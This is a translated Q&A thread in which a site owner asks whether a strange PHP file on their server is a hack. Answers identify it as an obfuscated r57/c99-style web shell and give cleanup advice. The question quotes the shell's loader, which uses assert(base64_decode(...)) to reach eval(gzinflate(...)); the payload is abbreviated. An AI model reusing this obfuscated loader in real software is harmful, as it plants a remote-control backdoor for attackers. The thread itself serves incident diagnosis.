在我们的某个目录中发现了一个我们没有创建的奇怪文件。
它被命名为“moreinfoege.php.KJt”在目录中我们还有一个名为moreinfo.php的文件
我们最近遇到了服务器问题(WordPress 黑客攻击、DDoS 攻击),因此我们显然对其他入侵保持高度警惕。这是黑客攻击吗?入侵的方式有哪些?
它的内容如下(为适应此处内容,我们将长串的乱码进行了缩写):
<?php $IRdphe='as';$lgOULt='e';$UXkpWY=$IRdphe.'s'.$lgOULt.'r'.'t';$kOUHAp='b'.$IRdphe.$lgOULt.(64).'_'.'d'.$lgOULt.'c'.'o'.'d'.$lgOULt;@$UXkpWY(@$kOUHAp('ZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgiNWIzcGVsczNzaTc4TzNtZTNNUHlNcnNwZFNocXNHekhsRVVQa3B6NHRHeTVMYVhUT1pJUFEzR1EyT0xVSEN3NzNqblgvcjF2VlFFTElCYzEyRW4zMmZ2eklKRVlDb1ZDb1ZBb0ZBcWQ5bEpuUEc1TmxncTF0M3QvKzNIdjhPaTQrT3JYUnJ2MTl1Zk85NzNpdStYbFQxK1BXK054WjlDdmpTZjEwV1JwZWV2clRudXAxN3lQS204T1dQNm9jL2pYNGNIYlYyYy9vdnoyZHZGQi9XSDkvb1BUK3c4ZWJkNXJ0dGVhemMzNzdYWmpyZG5ZYkt6Zng0L2k4dGVmQ3JYRHZjUERsd2V2ajR0L3ZmaGYzYmQvTzJ0L2VOYi82ZS9EOFVIenhmOCtQVy84OEhxMGU3Zy8yWnYrV255M3ZiNzFHeHU5YzZ0YXdIdzQ2dlFuU2ZxNDJYbWZqQ2NmdTYzdDRuQXc3a3pRbTByOWREem9UaWV0clc2 [...] lY1V281TlEvZUhIMDB6Tld4L0hmb1RTTjg1d0liV3VKVWJPazFCdGNOOGtyOE9iZzdSSGZFWkFyUjRZenFCYnlSTHJGVTUrdDMvNC8iKSkpOw==')); ?>
答案1
代码隐藏了正在assert(base64_decode(对文本从“ZXZ 到 W==”进行处理的事实。
该文本的解码显示另一个字符串正在进行另一个解码和解压缩,以eval(gzinflate(base64_decode("5b3pe...开头
如果没有发布完整的代码,我就不知道兔子洞的尽头是什么。你可以使用此网站来解码每个步骤:
http://www.webutils.pl/index.php?idx=base64 (注意:文本位于蓝色框中。)
此链接应该对第二部分有帮助: http://www.tareeinternet.com/scripts/decrypt.php
更新:根据完整文件,这似乎是 r57shell 或 c99shell 的变体。它为您的服务器提供了一个 Web 界面,用于执行诸如执行命令行操作和与 SQL 数据交互之类的操作。
此站点有其样例:http://phpsecurity.wordpress.com/2007/11/08/what-does-a-phpshell-look-like/
此网站上有一篇由也遇到过此问题的人发表的博客文章:http://basus.net/?p=19
答案2
它看起来像是经过 base64 编码的 PHP,这使得弄清楚发生了什么变得更加困难 - 但如果无法访问这两个文件,就很难分辨。我愿意用大量的巧克力打赌,你的主机仍然受到攻击。
根据攻击者之前设法获得的访问权限类型以及您如何从中恢复,可能会留下一些访问方法。
我建议您开始恢复程序 - 安装新的操作系统并从已知的良好副本恢复您的网站。
答案3
看起来像是黑客攻击。最近流行的获取此类文件的方法之一是通过 ftp。
有大量木马从流行的 Windows FTP 客户端 [例如 Total Commander] 捕获密码。凭证被报告给控制节点,这些控制节点直接或从其他受感染的机器将恶意 js/php 代码附加到索引文件、上传恶意 .htaccess 文件等。
检查文件的创建日期,尝试与您的托管服务提供商联系以获取该文件上传时的 ftp 日志。
为了安全起见... - 如果是 wordpress - 备份数据和代码;删除所有 php 文件,检查所有模板,从新版本恢复应用程序。